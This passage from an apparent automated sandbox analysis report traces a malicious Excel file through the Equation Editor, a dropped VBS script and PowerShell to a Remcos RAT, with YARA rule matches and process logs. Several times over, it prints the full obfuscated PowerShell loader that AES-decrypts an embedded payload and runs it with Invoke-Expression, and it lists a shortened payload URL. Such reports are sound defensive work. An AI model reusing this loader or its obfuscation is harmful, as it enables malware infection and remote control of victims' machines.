'+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_002256F69_2_002256F6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_002271E89_2_002271E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0022966C9_2_0022966C
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsOLE indicator, VBA macros: true
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsStream path 'MBD000177E2/\x1Ole' : http://tny.wtf/4Gs[gs@9*&;GcGR"/6Gtwu-bh0Y%NL%V{I}<7[Ey\gTI}.s-3y7e@sI$*Jj.~/&HDp[Zh4s{uV5U!"zg!>D!%7I%:-gYw@3 5CkpaFtvQvbo75yYuIhL5XEgAzxqfuesWASniF4gl7CfE5lGzEs5karySqgK8twkJVQj9Kh"fB$kR."y+w'
              Source: ~DFB88BC22996138750.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/29@6/3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\F0630000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR955B.tmpJump to behavior
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsOLE indicator, Workbook stream: true
              Source: F0630000.0.drOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H................K..............................................X..........s......&.....Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....@.......H................K........................................&.......................&.....Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsReversingLabs: Detection: 31%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
